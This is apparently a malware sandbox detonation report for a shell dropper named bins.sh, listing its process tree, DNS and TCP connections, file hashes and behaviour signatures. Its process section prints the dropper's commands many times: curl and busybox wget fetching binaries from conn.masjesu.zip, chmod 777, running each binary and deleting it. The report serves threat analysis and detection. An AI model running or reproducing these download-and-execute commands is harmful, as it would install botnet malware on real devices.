/tmp/D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p

[./D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p]

/usr/bin/rm

[rm D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf]

/usr/bin/chmod

[chmod 777 tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf]

/tmp/tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf

[./tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf]

/usr/bin/rm

[rm tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/lAKMISeUV2PhSu0DN3bVycJibusAQif91O]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/lAKMISeUV2PhSu0DN3bVycJibusAQif91O]

/usr/bin/chmod

[chmod 777 lAKMISeUV2PhSu0DN3bVycJibusAQif91O]

/tmp/lAKMISeUV2PhSu0DN3bVycJibusAQif91O

[./lAKMISeUV2PhSu0DN3bVycJibusAQif91O]

/usr/bin/rm

[rm lAKMISeUV2PhSu0DN3bVycJibusAQif91O]

Network

Country Destination Domain Proto
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.121.86.228:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
FR 37.44.238.68:80 conn.masjesu.zip tcp
US 1.1.1.1:53 debian12-armhf-20240221-en-3 udp
US 1.1.1.1:53 debian12-armhf-20240221-en-3 udp
US 1.1.1.1:53 conn.masjesu.zip udp
FR 37.44.238.68:80 conn.masjesu.zip tcp
US 1.1.1.1:53 debian12-armhf-20240221-en-3 udp
US 1.1.1.1:53 debian12-armhf-20240221-en-3 udp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.121.86.228:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
FR 37.44.238.68:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.121.86.228:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.121.86.228:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.121.86.228:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.121.86.228:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
FR 37.44.238.68:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
FR 37.44.238.68:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.121.86.228:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.121.86.228:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.121.86.228:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.121.86.228:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.121.86.228:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.121.86.228:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.121.86.228:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.121.86.228:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.121.86.228:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
FR 37.44.238.68:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.121.86.228:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
FR 37.44.238.68:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.121.86.228:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.121.86.228:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
FR 37.44.238.68:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
FR 37.44.238.68:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.121.86.228:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.121.86.228:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
FR 37.44.238.68:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
FR 37.44.238.68:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.121.86.228:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
FR 37.44.238.68:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.121.86.228:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.121.86.228:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.121.86.228:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
FR 37.44.238.68:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
FR 37.44.238.68:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.121.86.228:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.121.86.228:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.121.86.228:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
FR 37.44.238.68:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
FR 37.44.238.68:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.121.86.228:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.121.86.228:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
FR 37.44.238.68:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
FR 37.44.238.68:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
FR 37.44.238.68:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.121.86.228:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
FR 37.44.238.68:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.121.86.228:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
FR 37.44.238.68:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.121.86.228:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.121.86.228:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.121.86.228:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
FR 37.44.238.68:80 conn.masjesu.zip tcp
US 1.1.1.1:53 0.debian.pool.ntp.org udp

Files

/tmp/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Analysis: behavioral2

Detonation Overview

Submitted

2024-12-16 04:16

Reported

2024-12-16 04:33

Platform

debian12-mipsel-20240221-en

Max time kernel

45s

Max time network

50s

Command Line

[/tmp/bins.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /usr/bin/chmod N/A
N/A N/A /usr/bin/chmod N/A
N/A N/A /usr/bin/chmod N/A
N/A N/A /usr/bin/chmod N/A
N/A N/A /usr/bin/chmod N/A
N/A N/A /usr/bin/chmod N/A
N/A N/A /usr/bin/chmod N/A
N/A N/A /usr/bin/chmod N/A
N/A N/A /usr/bin/chmod N/A
N/A N/A /usr/bin/chmod N/A
N/A N/A /usr/bin/chmod N/A
N/A N/A /usr/bin/chmod N/A
N/A N/A /usr/bin/chmod N/A
N/A N/A /usr/bin/chmod N/A
N/A N/A /usr/bin/chmod N/A
N/A N/A /usr/bin/chmod N/A
N/A N/A /usr/bin/chmod N/A
N/A N/A /usr/bin/chmod N/A
N/A N/A /usr/bin/chmod N/A
N/A N/A /usr/bin/chmod N/A
N/A N/A /usr/bin/chmod N/A
N/A N/A /usr/bin/chmod N/A
N/A N/A /usr/bin/chmod N/A
N/A N/A /usr/bin/chmod N/A
N/A N/A /usr/bin/chmod N/A
N/A N/A /usr/bin/chmod N/A
N/A N/A /usr/bin/chmod N/A
N/A N/A /usr/bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA /tmp/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA N/A
N/A /tmp/CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX /tmp/CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX N/A
N/A /tmp/QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht /tmp/QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht N/A
N/A /tmp/zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO /tmp/zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO N/A
N/A /tmp/lAKMISeUV2PhSu0DN3bVycJibusAQif91O /tmp/lAKMISeUV2PhSu0DN3bVycJibusAQif91O N/A
N/A /tmp/o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj /tmp/o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj N/A
N/A /tmp/D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p /tmp/D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p N/A
N/A /tmp/tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf /tmp/tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf N/A
N/A /tmp/YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE /tmp/YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE N/A
N/A /tmp/37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J /tmp/37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J N/A
N/A /tmp/JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8 /tmp/JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8 N/A
N/A /tmp/wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ /tmp/wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ N/A
N/A /tmp/olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen /tmp/olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen N/A
N/A /tmp/GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ /tmp/GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ N/A
N/A /tmp/37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J /tmp/37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J N/A
N/A /tmp/JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8 /tmp/JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8 N/A
N/A /tmp/YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE /tmp/YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE N/A
N/A /tmp/olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen /tmp/olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen N/A
N/A /tmp/GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ /tmp/GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ N/A
N/A /tmp/wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ /tmp/wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ N/A
N/A /tmp/CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX /tmp/CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX N/A
N/A /tmp/QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht /tmp/QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht N/A
N/A /tmp/zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO /tmp/zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO N/A
N/A /tmp/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA /tmp/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA N/A
N/A /tmp/o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj /tmp/o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj N/A
N/A /tmp/D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p /tmp/D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p N/A
N/A /tmp/tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf /tmp/tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf N/A
N/A /tmp/lAKMISeUV2PhSu0DN3bVycJibusAQif91O /tmp/lAKMISeUV2PhSu0DN3bVycJibusAQif91O N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8 /usr/bin/curl N/A
File opened for modification /tmp/JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8 /usr/bin/curl N/A
File opened for modification /tmp/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA /usr/bin/curl N/A
File opened for modification /tmp/o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj /usr/bin/curl N/A
File opened for modification /tmp/37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J /usr/bin/curl N/A
File opened for modification /tmp/tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf /usr/bin/curl N/A
File opened for modification /tmp/D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p /usr/bin/curl N/A
File opened for modification /tmp/tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf /usr/bin/curl N/A
File opened for modification /tmp/olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen /usr/bin/curl N/A
File opened for modification /tmp/GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ /usr/bin/curl N/A
File opened for modification /tmp/D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p /usr/bin/curl N/A
File opened for modification /tmp/lAKMISeUV2PhSu0DN3bVycJibusAQif91O /usr/bin/curl N/A
File opened for modification /tmp/GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ /usr/bin/curl N/A
File opened for modification /tmp/olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen /usr/bin/curl N/A
File opened for modification /tmp/wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ /usr/bin/curl N/A
File opened for modification /tmp/CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX /usr/bin/curl N/A
File opened for modification /tmp/zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO /usr/bin/curl N/A
File opened for modification /tmp/lAKMISeUV2PhSu0DN3bVycJibusAQif91O /usr/bin/curl N/A
File opened for modification /tmp/YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE /usr/bin/curl N/A
File opened for modification /tmp/YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE /usr/bin/curl N/A
File opened for modification /tmp/QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht /usr/bin/curl N/A
File opened for modification /tmp/zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO /usr/bin/curl N/A
File opened for modification /tmp/wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ /usr/bin/curl N/A
File opened for modification /tmp/37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J /usr/bin/curl N/A
File opened for modification /tmp/QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht /usr/bin/curl N/A
File opened for modification /tmp/CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX /usr/bin/curl N/A
File opened for modification /tmp/o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj /usr/bin/curl N/A
File opened for modification /tmp/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA /usr/bin/curl N/A

Processes

/tmp/bins.sh

[/tmp/bins.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA]

/usr/bin/chmod

[chmod 777 YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA]

/tmp/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA

[./YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA]

/usr/bin/rm

[rm YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX]

/usr/bin/chmod

[chmod 777 CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX]

/tmp/CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX

[./CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX]

/usr/bin/rm

[rm CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht]

/usr/bin/chmod

[chmod 777 QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht]

/tmp/QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht

[./QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht]

/usr/bin/rm

[rm QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO]

/usr/bin/chmod

[chmod 777 zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO]

/tmp/zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO

[./zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO]

/usr/bin/rm

[rm zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/lAKMISeUV2PhSu0DN3bVycJibusAQif91O]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/lAKMISeUV2PhSu0DN3bVycJibusAQif91O]

/usr/bin/chmod

[chmod 777 lAKMISeUV2PhSu0DN3bVycJibusAQif91O]

/tmp/lAKMISeUV2PhSu0DN3bVycJibusAQif91O

[./lAKMISeUV2PhSu0DN3bVycJibusAQif91O]

/usr/bin/rm

[rm lAKMISeUV2PhSu0DN3bVycJibusAQif91O]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj]

/usr/bin/chmod

[chmod 777 o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj]

/tmp/o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj

[./o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj]

/usr/bin/rm

[rm o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p]

/usr/bin/chmod

[chmod 777 D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p]

/tmp/D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p

[./D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p]

/usr/bin/rm

[rm D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf]

/usr/bin/chmod

[chmod 777 tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf]

/tmp/tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf

[./tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf]

/usr/bin/rm

[rm tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE]

/usr/bin/chmod

[chmod 777 YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE]

/tmp/YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE

[./YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE]

/usr/bin/rm

[rm YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J]

/usr/bin/chmod

[chmod 777 37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J]

/tmp/37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J

[./37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J]

/usr/bin/rm

[rm 37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8]

/usr/bin/chmod

[chmod 777 JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8]

/tmp/JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8

[./JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8]

/usr/bin/rm

[rm JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ]

/usr/bin/chmod

[chmod 777 wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ]

/tmp/wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ

[./wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ]

/usr/bin/rm

[rm wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen]

/usr/bin/chmod

[chmod 777 olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen]

/tmp/olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen

[./olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen]

/usr/bin/rm

[rm olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ]

/usr/bin/chmod

[chmod 777 GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ]

/tmp/GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ

[./GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ]

/usr/bin/rm

[rm GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J]

/usr/bin/chmod

[chmod 777 37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J]

/tmp/37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J

[./37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J]

/usr/bin/rm

[rm 37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8]

/usr/bin/chmod

[chmod 777 JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8]

/tmp/JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8

[./JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8]

/usr/bin/rm

[rm JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE]

/usr/bin/chmod

[chmod 777 YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE]

/tmp/YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE

[./YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE]

/usr/bin/rm

[rm YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen]

/usr/bin/chmod

